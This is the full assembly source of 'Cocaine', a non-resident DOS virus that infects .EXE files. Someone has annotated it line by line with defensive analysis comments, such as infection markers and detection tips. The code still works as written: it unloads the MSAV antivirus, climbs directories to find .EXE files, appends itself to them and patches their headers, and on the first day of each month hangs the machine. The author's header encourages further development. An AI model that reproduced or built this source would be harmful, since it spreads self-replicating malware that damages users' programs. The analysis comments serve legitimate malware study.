; Virus name : Cocaine [CoKe]
; Virus author: Metal Militia
; Virus group : Immortal Riot
; Origin : Sweden
;
; This is a non-resident .EXE infector moving upwards using the
; "dot-dot" method. Watch your .EXE files for the bad guy signature
; "IR" somewhere in the beginning, after the MZ or ZM thang.. :)
;
; Also, check your back for a "?" a bit from it as well. Btw! Every time
; you run it, it'll take out that fucking MSAV piece of shit from your
; memory. I'm telling you, go get TB-SCAN or something instead of such
; hacked things. TB-Scan finds this virus as both Ear-6 and Burma but
; it is not any sort of hack from them or something. I didn't have time to
; fix the encryption, and since this is just a test from me i really
; don't give a shit, but of course you're always welcome to keep
; developing it, heheh :)
;
; To add here, is that Ear-6 is non-res com/exe infector, umm.. that's
; Dark Angels virus, and this is not alike it! Burma is non-res ow-vir,
; and also not very much alike this anyhow.. However, i've heard about
; some resident, non-ow Burma as well? Not sure on that one. So, it'll
; probably only confuse some users, I guess.. Enjoy Insane Reality #4!!
;
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
; COCAINE! [CoKE]
;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
.model tiny
.radix 16 ; NOTE: default radix is hex, so bare literals below (100, 21, 80, 1a, ...) are hex
.code
org 100
;-----------------------------------------------------------------------
; Entry point of the appended body (analysis notes, defender's view).
; Executes from inside an infected host .EXE: CS = segment of this code,
; DS = PSP segment (the code later adds 10h to it to get the load segment).
; Register roles: bp = load displacement ("delta offset"), applied to every
; [label+bp] data reference in the file. MASM syntax throughout.
;-----------------------------------------------------------------------
start:
mov blast,0fa01 ; ax=0FA01h, dx=5945h, int 16h: per the author's note this unloads
mov dx,5945h ; MSAV from memory. An int 16h call with AX=FA01h is a handy
int 16 ; indicator of resident-AV tampering when triaging DOS samples.
push ds ;Save the PSP segment; popped again in ret_to_host
push cs ;Set ES/DS/CS
pop es
push cs
pop ds ;for data accessing.
call get_offset ;Classic delta-offset trick: the pushed return address is
get_offset: ;the runtime address of get_offset; subtracting the
pop bp ;assembly-time offset leaves the load displacement
sub bp,offset get_offset ;in BP.
Reset_Variables: ;Copy the four words IP_old/CS_old/SP_old/SS_old into
lea di,[IP_storage+bp] ;IP_storage..SS_storage (4 x movsw via mov_it) so the
lea si,[IP_old+bp] ;far jump in Restore_To_Host targets this host's entry.
call mov_it
call mov_it
call mov_it
call mov_it
jmp set_dta ;Step over the mov_it subroutine body that follows
mov_it: ;Copy one word from DS:SI to ES:DI (ES = DS = CS here); called 4x by Reset_Variables
movsw ; copies one word and advances si/di
ret ; ret(urn) to caller
Set_DTA: ;Point the DTA at New_DTA (memory just past the body and header buffer)
lea dx,[New_DTA+bp] ;so FindFirst/FindNext results land after the virus image
mov ah,readin ;(readin = 1Ah = Set DTA). PSP:80h is left alone until exit.
int 21
mov ah,47h ; Get current directory (AH=47h, DL=0 = default drive)
mov dl,0 ; into the buffer at New_DTA+2Ch, i.e. right after the
lea si,[bp+new_dta+2ch] ; 43-byte find DTA; ret_to_host uses it to chdir back
int 21h
Find_first_file: ;AH=4Eh FindFirst with the mask 'masker' ('*IR.EXE'). DOS expands '*' over
mov ah,4e ; the rest of the name field, so this effectively matches any .EXE in the
lea dx,[bp+masker] ; directory; the literal mask string is still useful signature material.
Find_File: ;Shared int 21h for FindFirst (AH=4Eh) and FindNext (AH=4Fh)
int 21
jnc infeqt ; Match found: go infect it
jmp ch_dir ; No (more) matches here: move up one directory ('..')
Infeqt: ;Infect the file named in the DTA (DTA+1Eh = ASCIIZ filename). Expects bp = delta offset.
mov blast,3d02 ; Open read/write (AX=3D02h)
lea dx,[bp+New_DTA+1e] ; 1eh = DTA offset of the found filename
int 21
xchg bx,blast ; bx = file handle (1-byte form of mov bx,ax)
mov ah,3f ; Read (AH=3Fh)
mov mate,readin ; cx = 1Ah = 26 bytes: MZ header through the e_cs field at +16h
lea dx,[bp+exe_header] ; into the exe_header buffer (uninitialised memory past end_virus)
int 21
cmp word ptr [bp+exe_header+0e],'RI' ; Infection marker: the e_ss field (+0Eh) holds the
je close_file ; bytes "IR" once calculate_CSIP has run on a file.
; Already infected -> close it and look for the next one.
call Save_Old_Header ; Copy the host's SS/SP/IP/CS into the *_old words
mov blast,4202 ; Seek to end of file (AX=4202h, CX:DX = 0)
xor mate,mate ; -> DX:AX = current file length
cwd
int 21
push blast ; Preserve DX:AX (file length) across the header math
push dx
call calculate_CSIP ; New entry CS:IP = end of the host's load image (where the body lands)
pop dx
pop blast
call calculate_size ; Update e_cp / e_cblp in the header for the appended length
mov mate,end_virus-start ; cx = body length (start..end_virus; excludes exe_header and the DTA)
mov ah,svenne ; Write (AH=40h)
lea dx,[bp+start] ; the running body, including the *_old words just filled in,
int 21 ; appended at the end of the host
mov blast,4200 ; Seek back to offset 0 (AX=4200h, CX:DX = 0)
xor mate,mate
cwd
int 21
mov mate,readin ; cx = 1Ah bytes
mov ah,svenne ; Write (AH=40h)
lea dx,[bp+exe_header] ; the patched header over the original one
int 21
Close_File: ;Also reached directly when the marker was already present
mov ah,3e ; Close the handle in bx (AH=3Eh)
int 21
Find_Next_File:
mov ah,4f ; FindNext (AH=4Fh) on the same DTA
jmp Find_File ; shares the int 21h / jnc with FindFirst
No_More_Files: ;Reached (via K_kool) once chdir '..' fails at the root
mov ah,2a ; Get system date (AH=2Ah): dl = day of month
int 21
cmp dl,1 ; Payload trigger: the 1st day of any month
jne ret_to_host ; otherwise hand control back to the host
mov ah,9 ; Display string (AH=9)
lea dx,[bp+eternal_love] ; prints the '$'-terminated eternal_love text
int 21
jmp $ ; ...then spins forever: on trigger days the host never runs (system appears hung)
ret_to_host: ;Undo the environment changes, then transfer control to the host
lea dx,[bp+new_dta+2ch] ; chdir (AH=3Bh) back to the directory saved by Set_DTA;
mov ah,3bh ; the AH=47h path has no leading backslash, which works here
int 21 ; because the search loop has already walked up to the root
pop ds ; ds = PSP segment pushed at start
mov dx,80 ; Restore the DTA to the default PSP:0080h
mov ah,readin ; (AH=1Ah; 80 is hex because of .radix 16)
int 21
Restore_To_Host: ;Rebuild the host's CS/SS/SP from the header-relative values
push ds ; es = ds = PSP
pop es
mov blast,es
add blast,10 ; ax = PSP + 10h = load segment of the program image
add word ptr cs:[bp+CS_storage],blast
; Relocate the host's initial CS (header value is relative to the load segment)
cli ; No interrupts while ss:sp is being switched
add blast,word ptr cs:[bp+SS_storage] ; ax = load segment + relative SS
mov ss,blast ; switch to the host's original stack
mov sp,word ptr cs:[bp+SP_storage]
sti ; re-enable interrupts
db 0ea ; JMP FAR ptr16:16 opcode; the two words below are its immediate operand
IP_storage dw 0 ; offset part of the far jump (host IP)
CS_storage dw 0 ; segment part, relocated above (host CS)
SP_storage dw 0 ; working copies, filled from the *_old words by Reset_Variables
SS_storage dw 0
IP_old dw 0 ; Host entry values stored by Save_Old_Header. These words lie inside
CS_old dw 0fff0 ; start..end_virus, so each written copy carries its own host's values.
SP_old dw 0 ; With the initial 0FFF0h, (PSP+10h)+0FFF0h wraps back to the PSP segment,
SS_old dw 0fff0 ; so a first-generation run jumps to PSP:0000 (presumably the INT 20h terminate stub).
K_kool: ;Relay labels used by ch_dir to reach No_More_Files / Find_first_file.
jmp no_more_files ;No functional difference from jumping directly; presumably a
K_spam: ;leftover of short-jump range limits during development.
jmp find_first_file
Save_Old_Header: ;Stash the host's initial SS/SP/IP/CS (MZ header +0Eh/+10h/+14h/+16h). Clobbers ax.
mov blast,word ptr [exe_header+bp+0e] ; e_ss (+0Eh)
mov word ptr [SS_old+bp],blast
mov blast,word ptr [exe_header+bp+10] ; e_sp (+10h)
mov word ptr [SP_old+bp],blast
mov blast,word ptr [exe_header+bp+14] ; e_ip (+14h)
mov word ptr [IP_old+bp],blast
mov blast,word ptr [exe_header+bp+16] ; e_cs (+16h)
mov word ptr [CS_old+bp],blast
ret
calculate_CSIP: ;In: dx:ax = host file length. Computes the load-segment-relative CS:IP of the
push blast ;byte just past the host's load image (where the body gets appended) and
mov blast,word ptr [exe_header+bp+8] ;patches the header. Infected files therefore show "IR" at +0Eh, '?' at +12h,
mov cl,brutal ;SP = 0FFFEh and an entry point at the very end of the image. Clobbers ax, cx, dx.
shl blast,cl ;e_cparhdr (+8) is in paragraphs; << brutal (4) gives header bytes.
mov mate,blast
pop blast
sub blast,mate ;dx:ax = file length - header bytes
sbb dx,RAVE ;(RAVE = 0: borrow only)
mov cl,0c ;High word contributes dx << 12 paragraphs
shl dx,cl ;(65536 / 16 = 4096 = 1 << 12)
mov cl,brutal
push blast
shr blast,cl ;ax >> 4 = paragraphs in the low word
add dx,blast ;dx = segment (relative to the load segment)
shl blast,cl ;ax = paragraph-aligned part of the low word
pop mate
sub mate,blast ;cx = low word - aligned part = offset within the paragraph (0..0Fh)
mov word ptr [exe_header+bp+14],mate ;e_ip (new)
mov word ptr [exe_header+bp+16],dx ;e_cs (new): entry now lands on the appended body
mov word ptr [exe_header+bp+0e],'RI' ;e_ss replaced by the "IR" infection marker (checked in Infeqt)
mov word ptr [exe_header+bp+10],0fffe ;e_sp (new) = 0FFFEh
mov byte ptr [exe_header+bp+12],'?' ;low byte of e_csum (+12h) = '?', the second marker
ret
calculate_size: ;In: dx:ax = host file length. Rewrites e_cp (+4, SPAM) and e_cblp (+2, RUDE). Clobbers ax, cx, dx.
push blast ;Keep the pre-infection length for the remainder step below
add blast,end_virus-start ; dx:ax = file length + body length
adc dx,RAVE ; (RAVE = 0: carry only)
mov cl,POLICE
shl dx,cl ;High word in 512-byte pages: dx << 7 (65536 / 512 = 128)
mov cl,BRUTALITY
shr blast,cl ;Low word in pages: ax >> 9
add blast,dx
inc blast ;+1, unconditionally (rounds up even on an exact page boundary)
mov word ptr [exe_header+bp+SPAM],blast ; e_cp = total pages
pop blast ; ax = pre-infection length again
mov dx,blast
shr blast,cl ; ax = length rounded down to a 512-byte multiple (cl is still 9)
shl blast,cl
sub dx,blast ; dx = length mod 512
mov word ptr [exe_header+bp+RUDE],dx ;e_cblp = bytes in last page -- of the ORIGINAL length, not the infected one,
ret ;so e_cp and e_cblp disagree on infected files (a useful inconsistency when scanning)
ch_dir: ;Directory walk: once a directory is exhausted, move up with '..'
mov ah,3bh ; chdir (AH=3Bh)
lea dx,[bp+dot_dot] ; to '..'
int 21
jc no_more ; CF set: already at the root -> finish (No_More_Files via K_kool)
jmp k_spam ; Else restart FindFirst in the parent directory (via K_spam)
no_more:
jmp k_kool
blast equ ax ; Register and constant aliases (obfuscating names, resolved at assembly time)
mate equ cx
police equ 7 ; shift: high word -> 512-byte pages (65536 / 512 = 2^7)
brutality equ 9 ; shift: bytes -> 512-byte pages (2^9)
rave equ 0 ; Hey! That's you :) -- zero operand for the sbb/adc borrow/carry steps
spam equ 04 ; MZ header offset of e_cp (pages in file)
rude equ 02 ; MZ header offset of e_cblp (bytes in last page)
brutal equ 4 ; shift: paragraphs <-> bytes (2^4)
readin equ 1a ; doubles as AH=1Ah (Set DTA) and 1Ah = 26 header bytes read/written
svenne equ 40 ; AH=40h (write to handle)
virnote db 'Cocaine [CoKe]' ; Plain-text strings inside the body: not referenced by code, but static signature material
db '(c) Metal Militia/Immortal Riot'
eternal_love db 0dh,0ah,'Love to LISA :)',0dh,0ah,'$' ; '$'-terminated payload text printed by No_More_Files
db 'Cocaine''s running thrue your vains' ; unreferenced; the original spellings are part of the signature
db 'It seems you have become an addict'
masker db '*IR.EXE',0 ;FindFirst mask (see Find_first_file)
dot_dot db '..',0 ;chdir target for the upward walk (ch_dir)
end_virus: ;Everything from start to here is what gets written into victims
exe_header db 1a dup (?) ; 26-byte header buffer: not written to victims, lives after the body in memory
New_DTA: ; 43-byte find DTA follows, then the saved directory path at +2Ch
end start